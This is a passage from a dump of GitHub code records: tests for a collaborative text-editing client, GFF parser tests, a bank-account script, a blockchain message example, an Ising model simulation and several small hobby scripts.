#Get editors of not-existing file\n status, _ = get_editors('user1', 'nonexist')\n self.assertEqual(status, \"This file does not exsist.\")\n #Get editor with not-allowed user\n status, _ = get_editors('user2', 'file1')\n self.assertEqual(status, \"Must be owner to see editors\")\n\n # Test sending line changes\n def test_edit_line(self):\n create_file('user1', 'file1')\n lock_line('user1', 'file1', 1)\n\n # Normal line edit send\n status = send_new_edit('user1', 'file1', 1, 'new line!')\n time.sleep(0.5) # to assure that edit is handled by server\n self.assertEqual(status, \"\")\n status, content, _ = open_file('user1', 'file1')\n self.assertEqual(content, \"new line!\\n\")\n # Normal new line send\n status = send_new_edit('user1', 'file1', 2, 'new line!', True)\n time.sleep(0.5) # to assure that edit is handled by server\n self.assertEqual(status, \"\")\n status, content, _ = open_file('user1', 'file1')\n #print \"DEBUG content: \" + content\n\n self.assertEqual(content, \"new line!\\nnew line!\\n\")\n # Sending edit to line that is not locked\n status = send_new_edit('user1', 'file1', 2, 'new line!')\n self.assertEqual(status, \"Don't have lock on line 2\")\n # Sending line to non-existing file\n status = 
send_new_edit('user1', 'not_exist', 1, 'new line!')\n self.assertEqual(status, \"This file does not exsist.\")\n # Sending line to non-existing line number\n status = send_new_edit('user1', 'file1', -1, 'new line!')\n self.assertEqual(status, \"Don't have lock on line -1\")\n # Sending line to not available file\n status = send_new_edit('user2', 'file1', 1, 'new line!')\n self.assertEqual(status, \"Don't have rights to access file1\")\n # Sending symbols to file\n lock_line('user1', 'file1', 2)\n status = send_new_edit('user1', 'file1', 2, \"@${[]}#%&/()=?'~><\")\n self.assertEqual(status, \"\")\n time.sleep(0.5) # to assure that edit is handled by server\n status, content, _ = open_file('user1', 'file1')\n #print \"content: \" + content\n self.assertEqual(content, \"new line!\\n@${[]}#%&/()=?'~><\\n\")\n stop_listening()\n\n\n # Test line deleting\n def test_delete_line(self):\n create_file('user1', 'file1')\n lock_line('user1', 'file1', 1)\n send_new_edit('user1', 'file1', 1, 'new line!')\n time.sleep(1) # to assure that edit is handled by server\n lock_line('user1', 'file1', 2) #previous line can't be locked by same user\n status = delete_line('user1', 'file1', 1)\n self.assertEqual(status, \"\")\n time.sleep(0.5) # to assure that edit is handled by server\n\n status, content, _ = open_file('user1', 'file1')\n self.assertEqual(content, \"\")\n stop_listening()\n\n # Deleting edit of a line that is not locked\n lock_line('user1', 'file1', 1)\n status = delete_line('user1', 'file1', 1)\n self.assertEqual(status, \"Don't have lock on line 1\")\n # Deleting line of non-existing file\n status = delete_line('user1', 'not_exist', 1)\n self.assertEqual(status, \"This file does not exsist.\")\n # Deleting line of non-existing line number\n status = delete_line('user1', 'file1', -1)\n self.assertEqual(status, \"\")\n # Deleting line of not available file\n status = delete_line('user2', 'file1', 0)\n self.assertEqual(status, \"Don't have rights to access file1\")\n\n # Test line receiving\n def test_line_receiving(self):\n\n create_file('user1', 'file1')\n add_editor('user1', 'file1', 'user2')\n status, content, queue = open_file('user2', 'file1')\n\n lock_line('user1', 'file1', 1)\n send_new_edit('user1', 'file1', 1, '1st line!')\n lock_line('user1', 'file1', 2)\n send_new_edit('user1', 'file1', 2, 'new line!', True)\n\n\n try:\n #First should get first line edit\n line_no, line_cont, is_new_line = queue.get(block=True, timeout=1)\n self.assertEqual(line_no, 1)\n self.assertEqual(line_cont, \"1st line!\\n\")\n self.assertEqual(is_new_line, False)\n #After that second line edit\n line_no, line_cont, is_new_line = queue.get(block=True, timeout=1)\n self.assertEqual(line_no, 2)\n self.assertEqual(line_cont, \"new line!\\n\")\n self.assertEqual(is_new_line, True)\n\n except Empty:\n self.fail(\"Did not receive any message from queue (during 1 sec)\")\n finally:\n stop_listening()\n\n\n def tearDown(self):\n\n #Clear old files\n folder = '../src/sessions/server/_files/'\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n # shutdown server\n subproc.terminate()\n subproc.wait() #Wait until subproc is really terminated, otherwise may terminate next connection 
also\n","repo_name":"markus93/DSHomework1","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":11410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34972279674","text":"import unittest\nfrom module import gff_file\n\n\nclass MyTestCase(unittest.TestCase):\n def test_read_gff_file(self):\n mini_gff_file = \"./input_files/mini.gff\"\n gene_organism = {\n \"9519cfca-0c42-44d4-ab09-d37d33245d07\": \"sand_box\",\n \"78fbaf52-0a8b-4acb-a93c-5d50238e47bf\": \"sand_box\",\n }\n\n mini_gff = gff_file.HandleGFF(mini_gff_file, gene_organism, \"\")\n mini_gff.read_gff_file()\n scaffold = mini_gff.fields[(\"scaffold\", \"9519cfca-0c42-44d4-ab09-d37d33245d07\")]\n self.assertEqual(scaffold, \"3R\")\n\n strand = mini_gff.fields[(\"strand\", \"14f85617-72a1-4658-8abc-05f94e551114\")]\n self.assertEqual(strand, \"+\")\n\n position = mini_gff.fields[\n (\"position\", \"26187b4d-cdb3-4263-a6af-a5556bfb5474_26\")\n ]\n self.assertEqual(position, (36675298, 36675597))\n\n gene_id = mini_gff.child_parent_relationship[\n \"5d7a93e5-6390-4568-832b-a5d7ca162ac6\"\n ]\n self.assertEqual(gene_id, \"9519cfca-0c42-44d4-ab09-d37d33245d07\")\n\n mrna_parent_id = mini_gff.child_parent_relationship[\n \"14f85617-72a1-4658-8abc-05f94e551114\"\n ]\n self.assertEqual(\"78fbaf52-0a8b-4acb-a93c-5d50238e47bf\", mrna_parent_id)\n\n cds_parent_id = mini_gff.child_parent_relationship[\n \"79cdd16a-3988-4d9a-81a6-e0a17384013c\"\n ]\n self.assertEqual(\"14f85617-72a1-4658-8abc-05f94e551114\", cds_parent_id)\n\n gene_id_2 = mini_gff.get_gene_id(\"79cdd16a-3988-4d9a-81a6-e0a17384013c\")\n self.assertEqual(\"78fbaf52-0a8b-4acb-a93c-5d50238e47bf\", gene_id_2)\n\n def test_scan_true_gff_for_errors(self):\n true_gff_file = \"./input_files/true.gff\"\n\n true_gene_organism = dict()\n\n with open(\"./input_files/two_gene_organism.tsv\") as file_handle:\n for line in file_handle:\n gene_id, organism = line.rstrip().split(\"\\t\")\n true_gene_organism[gene_id] = organism\n\n true_gff = gff_file.HandleGFF(true_gff_file, true_gene_organism, \"\")\n true_gff.read_gff_file()\n\n true_gff.scan_gff_for_errors()\n self.assertEqual(true_gff.errors, {})\n\n def test_scan_false_gff_for_errors(self):\n false_gff_file = \"./input_files/simple_false.gff\"\n\n false_gene_organism = dict()\n with open(\"./input_files/simple_organism.tsv\") as file_handle:\n for line in file_handle:\n gene_id, organism = line.rstrip().split(\"\\t\")\n false_gene_organism[gene_id] = organism\n\n false_gff = gff_file.HandleGFF(false_gff_file, false_gene_organism, \"\")\n false_gff.read_gff_file()\n\n false_gff.scan_gff_for_errors()\n\n self.assertEqual(4, len(false_gff.errors))\n scaffold_error = false_gff.errors[\"f18e9140-5589-405b-86c3-0e54cf01390d\"]\n self.assertEqual(1, len(scaffold_error.gff_format_error))\n self.assertEqual(\"simple@ebi.ac.uk\", scaffold_error.owner)\n self.assertEqual(\"sand_box\", scaffold_error.organism_name)\n self.assertEqual(\"6c797cb7-1246-4add-aab4-a3287a12d27a\", scaffold_error.gene_id)\n self.assertEqual(\"8c5922b3-fe26-49dc-8aeb-9ac867b96c07\", scaffold_error.mrna_id)\n self.assertEqual(\"AGAP010269\", scaffold_error.gene_name)\n self.assertEqual(\"3R:51887721..51894443\", scaffold_error.locus)\n self.assertEqual(\n \"scaffold\", scaffold_error.gff_format_error[0].get(\"field_type\")\n )\n self.assertEqual(\"exon\", scaffold_error.gff_format_error[0].get(\"feature_type\"))\n self.assertEqual(\n 
\"f18e9140-5589-405b-86c3-0e54cf01390d\",\n scaffold_error.gff_format_error[0].get(\"feature_id\"),\n )\n self.assertEqual(\"2R\", scaffold_error.gff_format_error[0].get(\"feature_value\"))\n self.assertEqual(\n \"8c5922b3-fe26-49dc-8aeb-9ac867b96c07\",\n scaffold_error.gff_format_error[0].get(\"parent_id\"),\n )\n self.assertEqual(\"3R\", scaffold_error.gff_format_error[0].get(\"parent_value\"))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"VEuPathDB/apollo_email_report","sub_path":"test/test_gff_file.py","file_name":"test_gff_file.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18252240350","text":"from Cliente import Cliente\nfrom ContaCorrente import ContaCorrente\n\nlista = []\nwhile True:\n numeroConta = input(\"Digite seu número da conta: \")\n if numeroConta == \"0\":\n break\n saldo = float(input(\"Digite seu saldo: \"))\n nome = input(\"Digite seu nome: \")\n cpf = input(\"Digite seu cpf: \")\n\n cliente = Cliente(nome, cpf)\n contacorrente = ContaCorrente(numeroConta, saldo, cliente)\n\n lista.append(contacorrente)\n\nprint('')\nnumconta = input(\"Digite numero da conta: \")\n\nconta_existe = False\nfor conta in lista:\n if conta.numeroConta == numconta:\n conta_existe = True\n\nif conta_existe:\n for conta in lista:\n if conta.numeroConta == numconta:\n print(conta.exibirDados())\n operação = int(input(\"1 - para SACAR e 2 - para DEPOSITAR: \"))\n\n if operação == 1:\n valorSaque = float(input(\"Quanto deseja sacar: \")) \n if conta.sacar(valorSaque) == True:\n print(f\"Saque realizado com sucesso. Saldo atual {conta.saldo}\")\n else:\n print(f\"Saque não realizado. Saldo atual {conta.saldo}\")\n if operação == 2:\n valorDeposito = float(input(\"Quanto deseja depositar: \"))\n if conta.depositar(valorDeposito) == True:\n print(f\"Depósito realizado com sucesso. Saldo atual {conta.saldo}\")\n else:\n print(f\"Depósito não realizado. 
Saldo atual {conta.saldo}\")\nelse:\n print(\"conta n existe\")\n\nprint(\"\")\nsaldodetodos = 0\nif len(lista) > 0:\n for conta in lista:\n saldodetodos += conta.saldo\n print(f\"Saldo de todas as contas: {saldodetodos}\")\n\n maior = -1\n for conta in lista:\n if conta.saldo > maior:\n maior = conta.saldo\n print(f\"Maior saldo: {maior}\")\n\n menor = 9999999\n for conta in lista:\n if conta.saldo < menor:\n menor = conta.saldo\n print(f\"Menor saldo: {menor}\")\n","repo_name":"a1ramm/Programacao-I","sub_path":"contacorrente/TesteContaCorrente.py","file_name":"TesteContaCorrente.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34363995212","text":"\"\"\"Send a message.\"\"\"\r\n\r\n\r\nimport eospyo\r\n\r\n\r\ndata = [\r\n # Not specifying an account with the \"to\" field will send the message to the same account sending it in the \"from\" field\r\n eospyo.Data(name=\"from\", value=eospyo.types.Name(\"me.wam\")),\r\n eospyo.Data(\r\n name=\"message\",\r\n value=eospyo.types.String(\"hello from eospyo\"), # String specified for message type, type must be specificed\r\n ),\r\n]\r\n\r\nauth = eospyo.Authorization(actor=\"me.wam\", permission=\"active\")\r\n\r\naction = eospyo.Action(\r\n account=\"me.wam\",\r\n name=\"sendmsg\",\r\n data=data,\r\n authorization=[auth],\r\n)\r\n\r\nraw_transaction = eospyo.Transaction(actions=[action])\r\n\r\nnet = eospyo.Local()\r\nlinked_transaction = raw_transaction.link(net=net)\r\n\r\nkey = \"a_very_secret_key\"\r\nsigned_transaction = linked_transaction.sign(key=key)\r\n\r\nresp = signed_transaction.send()\r\n","repo_name":"FACINGS/eospyo","sub_path":"examples/send_message.py","file_name":"send_message.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"30836783963","text":"from art import logo\n\nprint(logo)\n\nprint(\"Welcome to the secret auction program.\\n\")\nbid_dictionary = {}\nis_Continue = False\n\n\ndef find_highest_bidder(bidding_record):\n highest_bid = 0\n winner = \"\"\n # bidding_record = {\"matthew\":222, \"daniel\":333 }\n for bidder in bidding_record:\n bid_amount = bidding_record[bidder]\n if bid_amount > highest_bid:\n highest_bid = bid_amount\n winner = bidder\n print(f\"The winner is {winner} with a bid of ${highest_bid}\")\n\n\nwhile not is_Continue:\n name = input(\"What is your name?: \")\n bid = int(input(\"What's your bid?: $\"))\n bid_dictionary[name] = bid\n\n other_Bidder = input(\"Are there any other bidders? 
Type 'yes' or 'no'.\").lower()\n    if other_Bidder == 'no':\n        is_Continue = True\n        find_highest_bidder(bid_dictionary)\n\n\nprint(bid_dictionary)\n\n# max_value = max(bid_dictionary.values())\n# print(max_value)\n","repo_name":"NinoosMoshi/python-100Days","sub_path":"day-9/bid_project.py","file_name":"bid_project.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71415694545","text":"import tensorflow as tf\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport random\nfrom tensorflow.keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Dense, Layer\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.metrics import Precision, Recall\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nANC_PATH = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/data/anchor'\nPOS_PATH = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/data/positive'\nNEG_PATH = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/data/negative'\n\n# Build the dataset paths with plain forward slashes\nanchor = tf.data.Dataset.list_files(ANC_PATH + '/*.jpg').take(300)\npositive = tf.data.Dataset.list_files(POS_PATH + '/*.jpg').take(300)\nnegative = tf.data.Dataset.list_files(NEG_PATH + '/*.jpg').take(300)\n#Preprocessing\n# Resizing the images for training. The network accepts images of up to 150x150; here we resize to 100x100\ndef preprocess(file_path):\n    \n    # Read in image from file path\n    byte_img = tf.io.read_file(file_path)\n    # Load in the image \n    img = tf.io.decode_jpeg(byte_img)\n    \n    # Preprocessing steps - resizing the image to be 100x100x3\n    img = tf.image.resize(img, (100,100))\n    # Scale image to be between 0 and 1 \n    img = img / 255.0\n\n    # Return image\n    return img\n#Preprocessing\n# Creating labelled datasets: positive = 1 and negative = 0. 
If an image is classified as negative, i.e. it is not a recognised face, the answer will be 0.\npositives = tf.data.Dataset.zip((anchor, positive, tf.data.Dataset.from_tensor_slices(tf.ones(len(anchor)))))\nnegatives = tf.data.Dataset.zip((anchor, negative, tf.data.Dataset.from_tensor_slices(tf.zeros(len(anchor)))))\ndata = positives.concatenate(negatives)\n\n\nsamples = data.as_numpy_iterator()\nexample = samples.next()\nprint(example)\n\n\n\n#Preprocessing\n# Partitioning the data into train and test\ndef preprocess_twin(input_img, validation_img, label):\n    return(preprocess(input_img), preprocess(validation_img), label)\nres = preprocess_twin(*example)\nplt.imshow(res[1])\n#Grab one image and show its label \nprint(res[2])\n\n# Dataloader iterator - load the images and check that the labelling is correct\n# Build dataloader pipeline\ndata = data.map(preprocess_twin)\ndata = data.cache()\ndata = data.shuffle(buffer_size=10000)\n\nsamples = data.as_numpy_iterator()\nlen(samples.next())\nsam = samples.next()\nplt.imshow(sam[1])\n#Grab one image and show its label \nprint(sam[2])\n\n# Building the training partition\n# Training uses 70% of the available data\ntrain_data = data.take(round(len(data)*.7))\n# Batch size is 8\ntrain_data = train_data.batch(8)\n# Keep 8 elements prefetched in memory ahead of the next batch\ntrain_data = train_data.prefetch(8)\n\n# Building the test partition\n# Testing uses 30% of the available data\ntest_data = data.skip(round(len(data)*.7))\ntest_data = test_data.take(round(len(data)*.3))\n# Batch size is 8\ntest_data = test_data.batch(8)\n# Keep 8 elements prefetched in memory ahead of the next batch\ntest_data = test_data.prefetch(8)\n\n#Building the full embedding network \ndef make_embedding(): \n    inp = Input(shape=(100,100,3), name='input_image') \n    # First block\n    c1 = Conv2D(64, (10,10), activation='relu')(inp)\n    m1 = MaxPooling2D(64, (2,2), padding='same')(c1) \n    # Second block\n    c2 = Conv2D(128, (7,7), activation='relu')(m1)\n    m2 = MaxPooling2D(64, (2,2), padding='same')(c2) \n    # Third block \n    c3 = Conv2D(128, (4,4), activation='relu')(m2)\n    m3 = MaxPooling2D(64, (2,2), padding='same')(c3) \n    # Final embedding block\n    c4 = Conv2D(256, (4,4), activation='relu')(m3)\n    f1 = Flatten()(c4)\n    d1 = Dense(4096, activation='sigmoid')(f1) \n    return Model(inputs=[inp], outputs=[d1], name='embedding')\n\n#Calling the builder\nembedding = make_embedding()\nembedding.summary()\n\n# Building the distance layer\n# Siamese L1 distance class\nclass L1Dist(Layer):\n    \n    # Init method - inheritance\n    def __init__(self, **kwargs):\n        super().__init__()\n        \n    # Compute similarity\n    def call(self, input_embedding, validation_embedding):\n        return tf.math.abs(input_embedding - validation_embedding)\n\nl1 = L1Dist()\n\n# Assembling the siamese model\ndef make_siamese_model(): \n    \n    # Anchor image input in the network\n    input_image = Input(name='input_img', shape=(100,100,3))\n    \n    # Validation image in the network \n    validation_image = Input(name='validation_img', shape=(100,100,3))\n    \n    # Combine siamese distance components\n    siamese_layer = L1Dist()\n    siamese_layer._name = 'distance'\n    distances = siamese_layer(embedding(input_image), embedding(validation_image))\n    \n    # Classification layer \n    classifier = Dense(1, activation='sigmoid')(distances)\n    \n    return Model(inputs=[input_image, validation_image], outputs=classifier, name='SiameseNetwork')\n\nsiamese_model = 
make_siamese_model()\nsiamese_model.summary()\n\nprint(\"The script is paused so the summaries can be reviewed. Type '1' to continue:\")\nuser_input = input()\n\nif user_input == '1':\n    print(\"Continuing...\")\n\n    # Loss and optimizer configuration\n    binary_cross_loss = tf.losses.BinaryCrossentropy()\n    opt = tf.keras.optimizers.Adam(1e-4) # 0.0001\n    # Setting up training checkpoints\n    checkpoint_dir = '/home/carlos/Documentos/reconhecimentoFace/FaceRecognition/training_checkpoints'\n    checkpoint_prefix = os.path.join(checkpoint_dir, 'ckpt')\n    checkpoint = tf.train.Checkpoint(opt=opt, siamese_model=siamese_model)\n\n    # Building the training step\n    @tf.function\n    def train_step(batch):\n        \n        # Record all of our operations \n        with tf.GradientTape() as tape:     \n            # Get anchor and positive/negative image\n            X = batch[:2]\n            # Get label\n            y = batch[2]\n            \n            # Forward pass\n            yhat = siamese_model(X, training=True)\n            # Calculate loss\n            loss = binary_cross_loss(y, yhat)\n        print(loss)\n            \n        # Calculate gradients\n        grad = tape.gradient(loss, siamese_model.trainable_variables)\n        \n        # Calculate updated weights and apply to siamese model\n        opt.apply_gradients(zip(grad, siamese_model.trainable_variables))\n        \n        # Return loss\n        return loss\n    \n\n    def train(data, EPOCHS):\n        # Loop through epochs\n        for epoch in range(1, EPOCHS+1):\n            print('\\n Epoch {}/{}'.format(epoch, EPOCHS))\n            progbar = tf.keras.utils.Progbar(len(data))\n            \n            # Creating a metric object \n            r = Recall()\n            p = Precision()\n            \n            # Loop through each batch\n            for idx, batch in enumerate(data):\n                # Run train step here\n                loss = train_step(batch)\n                yhat = siamese_model.predict(batch[:2])\n                r.update_state(batch[2], yhat)\n                p.update_state(batch[2], yhat) \n                progbar.update(idx+1)\n            print(loss.numpy(), r.result().numpy(), p.result().numpy())\n            \n            # Save checkpoints\n            if epoch % 10 == 0: \n                checkpoint.save(file_prefix=checkpoint_prefix)\n\n    # Training the model\n    print(\"Enter the number of training epochs: \")\n    epoch_input = input()\n\n    try:\n        # Convert the user input to an integer\n        epochs = int(epoch_input)\n        \n        # Check that the number of epochs is valid (greater than zero)\n        if epochs > 0:\n            train(train_data, epochs)\n        else:\n            print(\"The number of epochs must be greater than zero.\")\n    except ValueError:\n        print(\"Invalid input. Please enter a valid integer for the epochs.\")\n\nelse:\n    print(\"Invalid command. The script will exit.\")\n\n\n","repo_name":"CarlosNobuaki/reconhecimentoFace","sub_path":"preprocessamentoTreinamento.py","file_name":"preprocessamentoTreinamento.py","file_ext":"py","file_size_in_byte":8056,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35964284339","text":"\n# coding: utf-8\n\n# In[56]:\n\n\n# Code Mark 1.7: Ising Model in 2D\n\n# Importing all the necessary packages I will use:\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport numpy.random as rnd\n\n# Before I do anything I need to make sure the size of the lattice, the number of Monte Carlo steps, the number of temperature points and the number of equilibration steps are all accounted for:\nnum=240\nsteps_monte=150\ntemp_points=100\nsteps_equil=150\nnum_a=1/(steps_monte*(num**2))\nnum_b=1/((steps_monte**2)*(num**2))\n
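\n# Sketch for clarity (the functions below inline this sum): the periodic\n# nearest-neighbour sum that both the energy function and the Metropolis step use.\ndef neighbour_sum(Q, i, j):\n    return Q[(i+1)%num, j] + Q[i, (j+1)%num] + Q[(i-1)%num, j] + Q[i, (j-1)%num]\n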
\n# Next I must create an initial spin state for my lattice, with the 2 spin values (-1, 1):\ndef startspin(num): \n    spin=2*rnd.randint(2,size=(num,num))-1\n    return spin\n\n# Now I need to define the energy function. This will give the energy of any given spin state:\ndef calcenergy(Q):\n    starting_energy=0\n    for i in range(len(Q)):\n        for j in range(len(Q)):\n            g=Q[i,j]\n            n_y=Q[(i+1)%num,j]+Q[i,(j+1)%num]+Q[(i-1)%num,j]+Q[i,(j-1)%num]\n            starting_energy+=g*-n_y\n    return starting_energy/4\n\n# The magnetisation of a spin state is simply the sum of all the spins:\ndef calcmag(Q):\n    return np.sum(Q)\n\n# Now I need to code the Monte Carlo steps with the Metropolis algorithm for the Ising model:\ndef montestep(Q,P):\n    for i in range(num):\n        for j in range(num):\n            x=rnd.randint(0,num)\n            y=rnd.randint(0,num)\n            z=Q[x,y]\n            n_y=Q[(x+1)%num,y]+Q[x,(y+1)%num]+Q[(x-1)%num,y]+Q[x,(y-1)%num]\n            l=2*z*n_y\n            if l<0:\n                z*=-1\n            elif rnd.rand()<np.exp(-l*P):\n                z*=-1\n            Q[x,y]=z\n    return Q\n\n# Now I need to choose the temperature points, keeping only those between 0.5 and 5:\nTemp=np.random.normal(2.25,0.64,temp_points)\nTemp=Temp[(Temp>0.5)&(Temp<5)] \ntemp_points=np.size(Temp)\n\n# I need to define 0 points for each of the 4 physical quantities I wish to find:\nMagnetization=np.zeros(temp_points)\nSpecificHeat=np.zeros(temp_points) \nEnergy=np.zeros(temp_points)\nSusceptibility=np.zeros(temp_points)\n\n# Now I need to implement each function above by creating an Ising function with them:\nfor i in range(len(Temp)):\n    E_a=M_a=0\n    E_b=M_b=0\n    Q=startspin(num)\n    init_Temp_a=1/Temp[i] \n    init_Temp_b=init_Temp_a**2\n\n    for k in range(steps_equil): \n        montestep(Q,init_Temp_a) \n\n    for j in range(steps_monte):\n        montestep(Q,init_Temp_a) \n        Energy_calc=calcenergy(Q) \n        Mag_calc=calcmag(Q) \n        E_a=E_a+(Energy_calc)\n        M_a=M_a+(Mag_calc)\n        M_b=M_b+(Mag_calc**2)\n        E_b=E_b+(Energy_calc**2)\n\n    Magnetization[i]=num_a*M_a\n    Energy[i]=num_a*E_a\n    SpecificHeat[i]=(num_a*E_b-num_b*(E_a**2))*init_Temp_b\n    Susceptibility[i]=(num_a*M_b-num_b*(M_a**2))*init_Temp_a\n\n#Finally I can plot the 4 graphs I need to show the monte carlo steps of the ising model and can then conduct my research thereafter.\n    \nplt.plot(Temp, Energy,'d', color=\"#8A2BE2\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Energy (Arbitrary Units)\")\nplt.show()\n\nplt.plot(Temp, abs(Magnetization),'x', color=\"#7FFF00\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Magnetization (Arbitrary Units)\")\nplt.show()\n\nplt.plot(Temp, SpecificHeat, 'd', color=\"#00FFFF\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Specific Heat (Arbitrary Units)\")\nplt.show()\n\nplt.plot(Temp, Susceptibility, 'x', color=\"#0000FF\")\nplt.xlabel(\"Temperature (Kelvin)\")\nplt.ylabel(\"Susceptibility (Arbitrary Units)\")\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Brannoco/Ising","sub_path":"Ising+Model+Oisin+Brannock.py","file_name":"Ising+Model+Oisin+Brannock.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30992424595","text":"import time\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport random\nfrom pylsl import StreamInfo, StreamOutlet\n\n# function to move box\ndef move_box(dx, dy):\n    x, y = box.get_xy()\n    box.set_xy((x+dx, y+dy))\n    fig.canvas.draw_idle()\n\n# register key press event handlers\ndef on_press(event):\n    if event.key == 'left':\n        move_box(-0.1, 0)\n    elif event.key == 'right':\n        move_box(0.1, 0)\n    elif event.key == 'up':\n        \n        move_box(0, 0.1)\n        trail_text.set_text(f\"Trail : {1}\")\n        \n    elif event.key == 'down':\n        move_box(0, -0.1)\n    \nif __name__ == '__main__':\n    fontsize = 30 # fontsize\n    matplotlib.rcParams.update({'font.size': fontsize})\n\n    fig, ax = plt.subplots(figsize=(7,7)) # figure and axes\n    \n    fig.set_facecolor('black') # black background color\n    ax.set_xlim(-1, 1) # axis goes from -1 
to 1\n    ax.set_ylim(-1, 1)\n\n    ax.axvline(0, color='red') # red lines\n    ax.axhline(0, color='red')\n\n    box = plt.Rectangle((0,0), 0.2, 0.2, facecolor='blue', edgecolor='white')\n    ax.add_patch(box)\n    # create text object at top of plot\n    text = ax.text(0, 1, 'Right', ha='center', va='bottom', color='white')\n    trail_text = ax.text(-1, -1, f\"Trail : {0}\", ha='left', va='bottom', color='black')\n\n    fig.canvas.mpl_connect('key_press_event', on_press)\n    plt.xlim(xmin=-1.5, xmax=1.5)\n    plt.ylim(ymin=-1.5, ymax=1.5)\n    plt.show()\n    \n    ","repo_name":"adamaske/Brain_Bridge_Pain","sub_path":"Motor_Imagery/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74159049104","text":"\"\"\"\nHow to reverse a string in Python using iteration and recursion?\n\n\"\"\"\n\nstr = \"I like jam.\"\n\ndef reverse_string(s):\n    new_str = \"\"\n    s = list(s)\n\n    for i in range(len(s)):\n        # This index walks the string backwards.\n        char = s[len(s)- 1 - i]\n        new_str = new_str + char\n\n    print(new_str)\n\nreverse_string(str)\n\n\n# solution 2: recursion\n\ndef reverse(str):\n    if str == \"\":\n        return str\n    else:\n        return str[-1] + reverse(str[:-1])\n\nprint(reverse(str))\n\n\n# solution 3: recursive lambda\nbackward = lambda str: str[-1] + backward(str[:-1]) if str else str\n\nprint(backward(str))","repo_name":"ksenia-b/Technical-Interview","sub_path":"string/reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1755355287","text":"import os\nimport sys\nimport pathlib\nimport re\nimport xml.etree.ElementTree as Xml\n\n\ndef parse_id(coord: str) -> (str, str):\n    m = rx_coord.match(coord)\n    if m is None:\n        print(\n            'Invalid format: %s; must be {x,y} (braces can be omitted).' % coord\n        )\n        return None\n    return m.group(1, 2)\n
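\n# Note: parse_id depends on rx_coord, which is compiled further below, so it\n# only works once module start-up has finished, e.g.\n#   parse_id('{12,34}')  ->  ('12', '34')\n#   parse_id('12, 34')   ->  ('12', '34')\n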
\n\ndef find_text(coord):\n    parsed = parse_id(coord)\n    if parsed is None:\n        return None\n    (pid, tid) = parsed\n    t = root.find(f'./page[@id=\"{pid}\"]/t[@id=\"{tid}\"]')\n    if t is None:\n        return None\n    print('{%s,%s} => %s' % (pid, tid, t.text))\n    return t.text\n\n\nif len(sys.argv) < 2:\n    print(f'{os.path.basename(__file__)} [language-code]')\n    print(\"\"\"\n    Language codes:\n    88 - Chinese, Traditional\n    86 - Chinese, Simplified\n    82 - Korean\n    81 - Japanese\n    55 - Portuguese\n    49 - German\n    48 - Polish\n    44 - English\n    42 - Czech\n    39 - Italian\n    34 - Spanish\n    33 - French\n    07 - Russian\n\n    \"\"\")\n    exit(1)\n\n# Path to root of unpacked resource files\n# X4SRC = '../../unpacked'\n# X4SRC = 'E:/Games/X-Universe/X4/modding/unpacked/t/0001-L044.xml'\n\nLANG = 44\nX4SRC = sys.argv[1]\nif len(sys.argv) >= 3:\n    LANG = sys.argv[2]\n\nrx_coord = re.compile(r'{?\\s*(\\d+)\\s*,\\s*(\\d+)\\s*\\}?')\nrx_id = re.compile(r'({\\s*\\d+\\s*,\\s*\\d+\\s*\\})')\n\nfilepath = pathlib.Path(__file__).parent.absolute()\nlang_file = f't/0001-L0{LANG}.xml'\nfilepath = filepath.joinpath(X4SRC, lang_file)\nfilepath = filepath.resolve()\nif not filepath.exists():\n    print('file not found: ', filepath)\n    exit(1)\n\nprint('loading file...')\ntree = Xml.parse(filepath)\nroot = tree.getroot()\nprint('ready.')\n\nwhile True:\n    cmd = input('{} ')\n    if 'exit' == cmd.lower():\n        break\n\n    sids = [cmd]\n    while sids:\n        nr = []\n        for sid in sids:\n            if not sid:\n                continue\n            text = find_text(sid)\n            if text is None:\n                print('%s not found' % sid)\n                continue\n            matches = rx_id.findall(text)\n            if matches:\n                nr += matches\n        sids = nr\n        if not sids:\n            print()\n","repo_name":"eidng8/x4-mods","sub_path":"text-search.py","file_name":"text-search.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"72197922066","text":"import csv\nimport json\nimport requests\nfrom bs4 import 